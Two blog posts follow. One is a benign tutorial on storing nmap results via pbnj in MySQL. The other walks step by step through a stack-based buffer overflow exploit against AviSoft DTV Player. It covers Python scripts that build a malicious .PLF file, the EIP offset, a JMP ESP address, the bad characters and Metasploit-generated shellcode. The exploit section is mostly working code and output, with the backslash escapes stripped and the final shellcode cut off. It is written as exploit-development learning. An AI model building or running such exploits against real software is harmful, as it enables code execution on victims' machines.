Port scanning using pbnj!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Recently i installed Kali Linux on Vmware workstation. There was a tool called pbnj which can scan port and store results in mysql database. Sometime it is useful storing vulnerable assessment into database.But in Kali linux it is not installed as default. pbnj use nmap(with “-a [options] to scan network , I only use it store the result in database!

Let’s  see how to install and use it to scan port and store to database

root@find:~# apt-cache search pbnj
pbnj - a suite of tools to monitor changes on a network
root@find:~# apt-get install pbnj

Start mysql services on Kali Linux:

root@find:~# /etc/init.d/mysql start
[ ok ] Starting MySQL database server: mysqld ..
[info] Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..


Let’s find all file related of pbnj :

root@find:~# updatedb;locate pbnj
/usr/bin/outputpbnj
/usr/bin/scanpbnj
/usr/share/doc/pbnj
/usr/share/doc/pbnj/BUGS
/usr/share/doc/pbnj/EXAMPLES
/usr/share/doc/pbnj/NOTES-ON-NMAP-VERSION
/usr/share/doc/pbnj/README.gz
/usr/share/doc/pbnj/changelog.Debian.gz
/usr/share/doc/pbnj/changelog.gz
/usr/share/doc/pbnj/copyright
/usr/share/doc/pbnj/examples
/usr/share/doc/pbnj/examples/csv.yaml
/usr/share/doc/pbnj/examples/mysql.yaml
/usr/share/doc/pbnj/examples/pg.yaml
/usr/share/doc/pbnj/examples/sqlite3.yaml
/usr/share/man/man1/outputpbnj.1p.gz
/usr/share/man/man1/scanpbnj.1p.gz
/var/cache/apt/archives/pbnj_2.04-4_all.deb
/var/lib/dpkg/info/pbnj.list
/var/lib/dpkg/info/pbnj.md5sums



I am going to use mysql so i am only interested in “/usr/share/doc/pbnj/examples/mysql.yaml” . So we need to edit this file to use correct username, password and database :
root@find:~# cp /usr/share/doc/pbnj/examples/mysql.yaml ~/.pbnj-2.0/config.yaml;
nano ~/.pbnj-2.0/nano config.yaml
# YAML:1.0
# Config for connecting to a DBI database
# SQLite, mysql etc
db: mysql
# for SQLite the name of the file. For mysql the name of the database
database: pbnjdb
# Username for the database. For SQLite no username is needed.
user: root
# Password for the database. For SQLite no password is needed.
passwd:""
# Password for the database. For SQLite no host is needed.
host: localhost
# Port for the database. For SQLite no port is needed.
port: 3306

In Kali mysql password is blank and username “root”. You should really change the username and password. But i am doing it without changing anything. Set let’s configure mysql:
root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 44
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

mysql> create database pbnjdb;
Query OK, 1 row affected (0.00 sec)

mysql>

We are ready to go now:

root@find:~# scanpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.
Usage: scanpbnj [Options] {target specification}

Target Specification:
Can pass hostnames, IP addresses, networks, etc.
Ex: microsoft.com, 192.168.0.1, 192.168.1.1/24, 10.0.0.1-254
-i --iplist <iplist> Scan using a list of IPs from a file
-x --xml <xml-file> Parse scan/info from Nmap XML file

Scan Options:
-a --args <args> Execute Nmap with args (needs quotes)
-e --extraargs <args> Add args to the default args (needs quotes)
--inter <interface> Perform Nmap Scan using non default interface
-m --moreports <ports> Add ports to scan ex: 8080 or 3306,5900
-n --nmap <path> Path to Nmap executable
-p --pingscan Ping Target then scan the host(s) that are alive
--udp Add UDP to the scan arguments
--rpc Add RPC to the scan arguments
-r --range <ports> Ports for scan [def 1-1025]

--diffbanner Parse changes of the banner

Config Options:
-d --dbconfig <config> Config for results database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]
--dir <dir> Directory for SQLite or CSV file [def . ]

General Options:
--nocolors Don't Print Colors
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )

Now Let’s scan port:

root@find:~# scanpbnj -a "-sS"  localhost
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.

--------------------------------------
Starting Scan of 127.0.0.1
Inserting Machine
Inserting Service on 3306:tcp mysql
Inserting Service on 5432:tcp postgresql
Scan Complete for 127.0.0.1
--------------------------------------


Above the command option “-a” for nmap argument is “-sS”. Scan finished and hopefully result written to database. Let’s check:

root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 52
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

mysql> use pbnjdb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables
-> ;
+------------------+
| Tables_in_pbnjdb |
+------------------+
| machines |
| services |
+------------------+
2 rows in set (0.00 sec)

mysql> select * from services;
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| mid | service | state | port | protocol | version | banner | machine_updated | updated_on |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| 12 | mysql | up | 3306 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
| 12 | postgresql | up | 5432 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
2 rows in set (0.00 sec)

mysql>

mysql> select * from machines;
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| mid | ip | host | localh | os | machine_created | created_on |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| 1 | 192.168.2.92 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 2 | 192.168.2.96 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 3 | 192.168.2.91 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 4 | 192.168.2.98 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 5 | 192.168.2.99 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 6 | 192.168.2.100 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 7 | 192.168.2.97 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 8 | 192.168.2.94 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 9 | 192.168.2.93 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 10 | 192.168.2.90 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 11 | 192.168.2.95 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 12 | 127.0.0.1 | localhost | 1 | unknown os | 1364339543 | Tue Mar 26 19:12:23 2013 |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
12 rows in set (0.00 sec)

mysql>

There is another tool installed called outputpbnj which can be used to dump the result without manually logging to MySQL.

root@find:~# locate outputpbnj
/usr/bin/outputpbnj
/usr/share/man/man1/outputpbnj.1p.gz

root@find:~# outputpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Usage: outputpbnj [Query Options] [Config Options] [General Options]
Query Options:
-q --query <name> Perform sql query
-t --type <type> Output Type [csv,tab,html]
-f --file <filename> Store the result in file otherwise stdout
--both Print results and store them in a file
--dir <dir> Store the result in this directory [def .]

-l --lookup <name> Lookup descrition based on name
--list List of names and descriptions
-n --name Lookup all the names
-d --desc Lookup all the descriptions
-s --sql Lookup all the sql queries

Config Options:
--qconfig <file> Config of sql queries [def query.yaml]
--dbconfig <file> Config for accessing database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]

General Options:
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )


Okay, Let’s dump the latest result:

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Error in option spec: "test|=s"
Error in option spec: "debug|=s"

wtf!

It is not working for as expected, No problem i am going to edit the “outputpbnj”(perl script). I have to remove “|” from “test” and “debug”. Kali linux use LeafPad text editor so “leafpad /usr/bin/outputpbnj” or you can use gedit or kate/kwrite(KDE) . Then searching for “test|=s”:

GetOptions(
%options,
'type|t=s', 'file|f=s', 'lookup|l=s', 'both|b',
'query|q=s', 'names|n', 'desc|d', 'sql|s', 'list',
'dbconfig=s', 'configdir=s', 'dir=s', 'data=s', 'qconfig=s',
'test|=s', 'debug|=s',
'help|h' => sub { help(); },
'version|v' => sub { print_version(); },
'both' => sub { $bothOutput = 1 },
)
or exit 1;

Just remove the pipe “|” from “test” and “debug”, It should be :‘test=s’,    ‘debug=s’  Now save and run :

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Tue Mar 26 19:12:23 2013 localhost mysql up unknown versiontcp
Tue Mar 26 19:12:23 2013 localhost postgresql up unknown version tcp


It is possible save the output in different format. For example:

root@find:~# mkdir pbnjr
root@find:~# outputpbnj -q latestinfo -t html -f pbnjr/report.html
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.

root@find:~# cd pbnjr
root@find:~/pbnjr# ls
report.html
root@find:~/pbnjr# iceweasel report.html
root@find:~/pbnjr#

Another curiosity that i can use only one query(“-q”) or there are more…. no, I can use many command:

possiblevuln
sshmachines
allservices
services
unknown_version_up
unknown_banner_up
machines
mdump
servicesup
service_audit 

All the query command is available in outputpbnj script(With Description)!

These kind of tool really useful for vulnerability assessment. pbnj is really a nice tool.

Exploit writing – Stack based Buffer overflow

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

There are many exploit writing tutorials. But the corelan’s exploit writing tutorials are much much better. If you want to learn exploit development , of course you may get started with corelan too. Anyway,

Today i have tried to exploit an application , found at http://www.exploit-db.com/exploits/22932/ (The exploit script did not work for me). Exploiting the vulnerability was very easy but specifically finding the bad char was bit tricky. At least I was able to find all bad char using Corelan’s mona.py and exploited the application successfully.  The following tools i used to develop the exploit:

1. Vmware workstation .

2. Python.

3. Immunity Debbugger .

4. Mona.py. (Copy mona.py to “C:Program FilesImmunity IncImmunity DebuggerPyCommands”)

5. Windows XP3 and windows 7.

6. Metasploit.

If you are going to try/build this exploit yourself then you also need those above tools, So make sure to download them as your preparation.

i have downloaded the vulnerable application first and installed on windows xp3 vm.

                                      CRASH AND LENGTH OF BUFFER

The simple crash script was:

print "Creating expoit."
f=open("crash-me.PLF","w")
push="A" * 2000

try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

It will create a file “crash-me.PLF” . If i open the file in AviSoft DTV Player then it just crashes. Well, Let’s Attach with Immunity Debugger to see what is happening.

Click on Debbug>>Run .

Now let’s open the “crash-me.PLF” :

So its finally crashed and i saw esp and eip register contains “AAAAAAAA….” :

It clearly indicating that i control EIP which is mean the crash is really exploitable(Explaining later!).   Now it is time to find how many the stack requiring for getting overwritten EIP. So time to work with a great tool mona.py .  There was old odd way to do that but now we can do it using metasploit or mona.py very easily. We already know the application crashed since we sent 2000Bytes junk. So we will create a Cycling Patter using mona.

First i set default working folder for mona:

mona config -set workingfolder c:mona%p

Then Mona command is : 

!mona pattern_create 2000

 It just created a file in C:monaAviosoftDTV called “pattern.txt” . This time need to edit the script again and put the Cycling patter instead “A”.  the full script will be look like this:

print "Creating expoit."
f=open("crash-me.PLF","w")
push="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"

try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

Replacing “A”*2000 with following pattern generated by mona

Now need to regenerate the “crash-me.PLF” file and open with AviSoft DTV(Already attached with debugger) . So the application crashed again but  with mona’s Cycling pattern instead “AAAAAA…” . So i need to take note of EIP value. In my case it is “37694136” :

This time we need to figure out the exact bytes to overwrite EIP . For this mona is enough :

!mona pattern_offset 37694136

 It tells that we need 260 bytes to overwrite stack and more 4 bytes we will need to overwrite EIP. So it is 260+4=264 bytes

Let’s modify the script again:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Found by mona.py
eip ="BBBB" #more 4 bytes to overwrite EIP
junk="C"*1736 #Later will replace this with real shellcode

try:
f.write(push+eip+junk)
f.close()
print "File created"
except:
print "File cannot be created"

In the script i have replaced Cycling patter with 260 bytes “A” and more 4 bytes to overwrite EIP with “BBBB” then 1736 bytes (2000-264). If first junk(260 bytes) length is okay then EIP will be “BBBB”. Let’s try:

See EIP is 42424242=BBBB and ESP(Stack Pointer) is contains CCCC.. But here i see another problem that after EIP  some “CCCC”:

0012EB5C   42424242  BBBB
0012EB60 43434343 CCCC
0012EB64 43434343 CCCC
0012EB68 43434343 CCCC
0012EB6C 43434343 CCCC


We really need to jump over these nasty junk. See later on. Anyway, We see we are controlling EIP. Because there are  “BBBB”.

Our Next goal will be:

1. Replacing “BBBB” with valid pointer(Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC… after EIP) easy problem.
3. Replacing “CCCCCC…” with real shellcode.

                                                                   FIND EIP
Let’s find EIP address. EIP address can be found in application or OS dll. For reliability we should always try to use Application’s dll if possible. So In this application i am going to find the EIP from application’s dll. Again i will use use mona(mona is very powerful and i know what i am doing.) . So the command should be:

!mona jmp -r esp -o


It will create a file called “jmp.txt” in “C:monaAviosoftDTV” and there will be following contents:

0x6034c153 : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034c4db : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034d9cb : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034dc73 : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x640614e3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:Program FilesAviosoftAviosoft DTV Player ProMediaPlayerCtrl.dll)
0x640627a3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:Program FilesAviosoftAviosoft DTV Player ProMediaPlayerCtrl.dll)
0x64119bc3 : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:Program FilesAviosoftAviosoft DTV Player ProNetReg.dll)
0x6411a7ab : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:Program FilesAviosoftAviosoft DTV Player ProNetReg.dll)

Here i will use 0x6411a7ab. Before that for learning purpose let’s find this address manually using Immunity Debugger itself(First we need to trigger the crashed otherwise all dll won’t load properly):

1. Immunity Debugger menu : View>> View Executable Modules .
2. Find the “NetReg.dll” and double click on it:

3. Our goal is finding “JMP ESP” . 
4. Right click on the window and Search For>> All Commands>>

5. Now another window will pop up and search for “jmp esp”

I was keeping searching until found the 0x6411a7ab.

                             ATTEMPT TO EXECUTE SHELLCODE
Anyway, let’s get back to real work. We need to modify the script put the address in EIP variable instead “BBBB”. We should remember that windows is little endian , means we need reverse the address so EIP should be “0x6411a7ab=xabxa7x11x64. Here is the modified script:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="C"*1500 #Later will replace this with real shellcode

try:
f.write(push+eip+junk)
f.close()
print "File created"
except:
print "File cannot be created"
Let’s run the application through Debugger and it should now have the exact address i have set. Time to make the application execute the shellcode. So i am modifying the script again to make it more safe:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py, "A" Replaced with nops
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #More nops before reach to shellcode
shellcode="D"*1000 #Will replace with shellcode.
try:
f.write(push+eip+junk+shellcode)
f.close()
print "File created"
except:
print "File cannot be created"
What i did on above script is just replaced all “A” with nops. Nops mean do nothing but pass to next instruction(Not a good idea?). Recently i mentioned that after EIP we see some unnecessary “CCCCCC…”  which will completely break our exploit. Putting enough nops will solve this problem too. Before going to next step let’s test it if it is working as i expected.

1. Setting breakpoint at EIP address 0x6411a7ab to make sure that our exploit is reaching to right address. To do that we need to following :

Right click>>Go to >>Expression

2. When new window will pop up , search the eip address,  You may need to search it twice. If found the address then we will see like this:

3. Now press F2. It may warn you about breakpointing to this address but you can ignore the warning. Well, Now i am going to open it(Attached with debugger). It hits the breakpoint and i can see now i am landing to nops directly:

So it worked!

Let’s put real shellcode instead “D”. It is time to use metasploit to generate windows/exec shellcode to execute calc.exe:

msfpayload windows/exec cmd=calc R |msfencode -b "x00x0a" -t c

I tried to avoid the normal bad char “x00x0a”. And Metasploit  generated following shellcode:

 

[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] =
"xbex28xc7x1bx1fxd9xedxd9x74x24xf4x58x31xc9xb1"
"x32x31x70x12x83xe8xfcx03x58xc9xf9xeax64x3dx74"
"x14x94xbexe7x9cx71x8fx35xfaxf2xa2x89x88x56x4f"
"x61xdcx42xc4x07xc9x65x6dxadx2fx48x6ex03xf0x06"
"xacx05x8cx54xe1xe5xadx97xf4xe4xeaxc5xf7xb5xa3"
"x82xaax29xc7xd6x76x4bx07x5dxc6x33x22xa1xb3x89"
"x2dxf1x6cx85x66xe9x07xc1x56x08xcbx11xaax43x60"
"xe1x58x52xa0x3bxa0x65x8cx90x9fx4ax01xe8xd8x6c"
"xfax9fx12x8fx87xa7xe0xf2x53x2dxf5x54x17x95xdd"
"x65xf4x40x95x69xb1x07xf1x6dx44xcbx89x89xcdxea"
"x5dx18x95xc8x79x41x4dx70xdbx2fx20x8dx3bx97x9d"
"x2bx37x35xc9x4ax1ax53x0cxdex20x1ax0exe0x2ax0c"

Anyway, Let’s modify the script again:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #500 nops before real shellcode
shellcode=("xbex28xc7x1bx1fxd9xedxd9x74x24xf4x58x31xc9xb1"
"x32x31x70x12x83xe8xfcx03x58xc9xf9xeax64x3dx74"
"x14x94xbexe7x9cx71x8fx35xfaxf2xa2x89x88x56x4f"
"x61xdcx42xc4x07xc9x65x6dxadx2fx48x6ex03xf0x06"
"xacx05x8cx54xe1xe5xadx97xf4xe4xeaxc5xf7xb5xa3"
"x82xaax29xc7xd6x76x4bx07x5dxc6x33x22xa1xb3x89"
"x2dxf1x6cx85x66xe9x07xc1x56x08xcbx11xaax43x60"
"xe1x58x52xa0x3bxa0x65x8cx90x9fx4ax01xe8xd8x6c"
"xfax9fx12x8fx87xa7xe0xf2x53x2dxf5x54x17x95xdd"
"x65xf4x40x95x69xb1x07xf1x6dx44xcbx89x89xcdxea"
"x5dx18x95xc8x79x41x4dx70xdbx2fx20x8dx3bx97x9d"
"x2bx37x35xc9x4ax1ax53x0cxdex20x1ax0exe0x2ax0c")
shellcode+="x90"*900 #Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:
f.write(all)
f.close()
print "File created"
except:
print "File cannot be created"

Well, ReGenerate the “crash-me.PLF” file and opening with the attached avisoft dtv but unfortunately it just crashed….

It does not even land to nops(wtf!). Seems it is happening for bad char, some code has been truncated. But no problem we can find the bad char using mona and this was my new knowledge today learning to use mona to find bad char easily. bad chars can corrupt, truncate our shellcode. If there is any bad chars then our exploits won’t work!

So instead spending much time i am going to use mona to find the bad chars(This will be good idea).I am using the first crash PoC again. Let’s see how i did it.

                                                    

                                                      FINDING BAD CHARS
First command:

!mona bytearray -b "x00"

“x00” is common bad char so i used it to generate all bytecode using mona.

Mona created two file in C:monaAviosoftDTV , 1. bytearray.txt 2. bytearray.bin . bytearray.bin is binary which will need later for comparing.

Well, in bytearray.txt are following contents :

Modify the script and put the generated output to the script right after  variable push=”A”*2000 :

print "Creating expoit."
f=open("badchar.PLF","w") #Create the file

push="A"*2000 #Found by mona.py
push+=("x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")


try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

Now generate the file “badchar.PLF”. Attach the application with debugger, run, open “badchar.PLF” and use another mona command is :

!mona compare -f C:monaAviosoftDTVbytearray.bin

It will create another file called “compare.txt” when we will see like this:

open “compare.txt” in notepad and search for “stack”(http://pastebin.com/YLCnyne7) and after scrolling down a little bit i can see :

                | File           | Memory         | Note       
---------------------------------------------------------------
0 0 9 9 | 01 ... 09 | 01 ... 09 | unmodified!
---------------------------------------------------------------
9 9 99 100 | 0a ... 6c | 00 ... 61 | expanded
108 109 1 1 | 6d | 6d | unmodified!
109 110 5 5 | 6e 6f 70 71 72 | 20 46 69 6c 65 | corrupted
114 115 1 1 | 73 | 73 | unmodified!
115 116 2 2 | 74 75 | 5c 41 | corrupted
117 118 1 1 | 76 | 76 | unmodified!
118 119 137 137 | 77 ... ff | 69 ... 00 | corrupted

Possibly bad chars: 0a
Bytes omitted from input: 00

It is comparing data’s file and memory. If there is no bad char then File and Memory data will be same. See above the first line:

9   9   99  100 | 0a ... 6c      | 00 ... 61      | expanded 

Unfortunately it did not match. Mona also suggesting that the bad char may be “0a” because “0a” from file does not match to memory … is it?

So this time again we need to generate bytearray:

!mona bytearray -b "x00x0a"

Now we again need to compare with bytearray(See above, it is same)…. Just keep doing it until i found all bad chars.

                             

                                              EXECUTE SHELLCODE
By mona i found the bad chars are “x00xffx0ax0dx1a” . After found these bad chars i regenerated the shellcode:

root@pusheax.com:/usr/bin# msfpayload windows/exec cmd=calc R |msfencode -b "x00xffx0ax0dx1axff" -t c
[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] =
"xdaxdbxd9x74x24xf4x5bx31xc9xb1x32xb8x6exb9xe3"
"x05x31x43x17x83xc3x04x03x2dxaax01xf0x4dx24x4c"
"xfbxadxb5x2fx75x48x84x7dxe1x19xb5xb1x61x4fx36"
"x39x27x7bxcdx4fxe0x8cx66xe5xd6xa3x77xcbxd6x6f"
"xbbx4dxabx6dxe8xadx92xbexfdxacxd3xa2x0exfcx8c"
"xa9xbdx11xb8xefx7dx13x6ex64x3dx6bx0bxbaxcaxc1"
"x12xeax63x5dx5cx12x0fx39x7dx23xdcx59x41x6ax69"
